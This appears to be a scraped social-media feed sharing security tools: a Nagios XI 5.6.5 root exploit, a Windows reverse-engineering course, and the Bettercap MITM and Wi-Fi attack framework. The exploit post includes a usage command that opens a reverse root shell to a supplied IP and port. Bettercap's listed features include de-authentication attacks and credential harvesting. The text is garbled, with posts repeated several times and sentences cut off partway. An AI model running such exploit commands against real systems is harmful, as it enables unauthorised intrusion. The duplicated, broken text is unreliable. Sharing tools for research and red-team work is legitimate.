nagiosxi-root-exploit:-- #POC which #exploits a #vulnerability within #Nagios XI (5.6.5) to #spawn a #root #shell
A vulnerability exists in Nagios XI <= 5.6.5 allowing an attacker to leverage an RCE to #escalate #privileges to root.
The exploit requires access to the server as the 'nagios' user, or CCM access via the web interface with permissions to manage #plugins.
A #PHP POC has been developed which #uploads a #payload resulting in a #reverse root shell.
#Usage:
php privesc.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port
#Download #Link:-
https://github.com/jakgibb/nagiosxi-root-rce-exploit
nagiosxi-root-exploit:-- #POC which #exploits a #vulnerability within #Nagios XI (5.6.5) to #spawn a #root #shell
A vulnerability exists in Nagios XI
A vulnerability exists in Nagios XI <= 5.6.5 allowing an attacker to leverage an RCE to #escalate #privileges to root.
The exploit requires access to the server as the 'nagios' user, or CCM access via the web interface with permissions to manage #plugins.
A #PHP POC has been developed which #uploads a #payload resulting in a #reverse root shell.
#Usage:
php privesc.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port
#Download #Link:-
https://github.com/jakgibb/nagiosxi-root-rce-exploit
nagiosxi-root-exploit:-- #POC which #exploits a #vulnerability within #Nagios XI (5.6.5) to #spawn a #root #shell
A vulnerability exists in Nagios XI
Z0FCourse_ReverseEngineering:-- #Reverse #engineering course by Z0F. Focuses on x64 #Windows.
This course is going to teach anyone how to reverse engineer x64 Windows. We will start by covering some basics of #binaries, then reverse some small samples, #reverse a #DLL and implement it into our own #program, reverse some malware, then look at some realistic situations.
#Download #Link:-
https://github.com/0xZ0F/Z0FCourse_ReverseEngineering
Z0FCourse_ReverseEngineering:-- #Reverse #engineering course by Z0F. Focuses on x64 #Windows.
This course is going to teach anyone how to reverse engineer x64 Windows. We will start by covering some basics of #binaries, then reverse some small samples, #reverse a #DLL and implement it into our own #program, reverse some malware, then look at some realistic situations.
#Download #Link:-
https://github.com/0xZ0F/Z0FCourse_ReverseEngineering
This course is going to teach anyone how to reverse engineer x64 Windows. We will start by covering some basics of #binaries, then reverse some small samples, #reverse a #DLL and implement it into our own #program, reverse some malware, then look at some realistic situations.
#Download #Link:-
https://github.com/0xZ0F/Z0FCourse_ReverseEngineering
Z0FCourse_ReverseEngineering:-- #Reverse #engineering course by Z0F. Focuses on x64 #Windows.
This course is going to teach anyone how to reverse engineer x64 Windows. We will start by covering some basics of #binaries, then reverse some small samples, #reverse a #DLL and implement it into our own #program, reverse some malware, then look at some realistic situations.
#Download #Link:-
https://github.com/0xZ0F/Z0FCourse_ReverseEngineering
Photos from National Cyber Security Services's post
Bettercap:-- The #Swiss #Army #knife for 802.11, BLE and Ethernet network #reconnaissance and #MITM attacks.
#Bettercap is a #powerful, easily extensible and portable #framework written in #Go which aims to offer to #security #researchers, #redteamers and #reverse #engineers an easy to use, all-in-one solution with all the features they might possibly need for performing reconnaissance and attacking #WiFi networks, #Bluetooth Low Energy devices, #wireless #HID devices, and Ethernet networks.
Main Features:-
1. WiFi networks scanning, de-authentication attack, clientless #PMKID association attack, and automatic #WPA/ #WPA2 client handshakes capture.
2. Bluetooth Low Energy devices scanning, characteristics enumeration, reading, and writing.
3. 2.4Ghz wireless devices scanning and #MouseJacking attacks with over-the-air HID frames injection (with #DuckyScript support).
4. Passive and active IP network hosts probing and recon.
5. #ARP, #DNS and #DHCPv6 spoofers for MITM attacks on IP based networks.
6. Proxies at the packet level, #TCP level and #HTTP/ #HTTPS application-level fully scriptable with easy to implement javascript plugins.
7. A powerful network sniffer for credentials harvesting which can also be used as a network #protocol #fuzzer.
8. A very fast port scanner.
9. A powerful #REST #API with support for asynchronous events notification on #WebSocket to orchestrate your attacks easily.
10. A very convenient #web UI.
More!
#Download #Link:-
https://github.com/bettercap/bettercap
Bettercap:-- The #Swiss #Army #knife for 802.11, BLE and Ethernet network #reconnaissance and #MITM attacks.
#Bettercap is a #powerful, easily extensible and portable #framework written in #Go which aims to offer to #security #researchers, #redteamers and #reverse #engineers an easy to use, all-in-one solution with all the features they might possibly need for performing reconnaissance and attacking #WiFi networks, #Bluetooth Low Energy devices, #wireless #HID devices, and Ethernet networks.
Main Features:-
1. WiFi networks scanning, de-authentication attack, clientless #PMKID association attack, and automatic #WPA/ #WPA2 client handshakes capture.
2. Bluetooth Low Energy devices scanning, characteristics enumeration, reading, and writing.
3. 2.4Ghz wireless devices scanning and #MouseJacking attacks with over-the-air HID frames injection (with #DuckyScript support).
4. Passive and active IP network hosts probing and recon.
5. #ARP, #DNS and #DHCPv6 spoofers for MITM attacks on IP based networks.
6. Proxies at the packet level, #TCP level and #HTTP/ #HTTPS application-level fully scriptable with easy to implement javascript plugins.
7. A powerful network sniffer for credentials harvesting which can also be used as a network #protocol #fuzzer.
8. A very fast port scanner.
9. A powerful #REST #API with support for asynchronous events notification on #WebSocket to orchestrate your attacks easily.
10. A very convenient #web UI.
More!
#Download #Link:-
https://github.com/bettercap/bettercap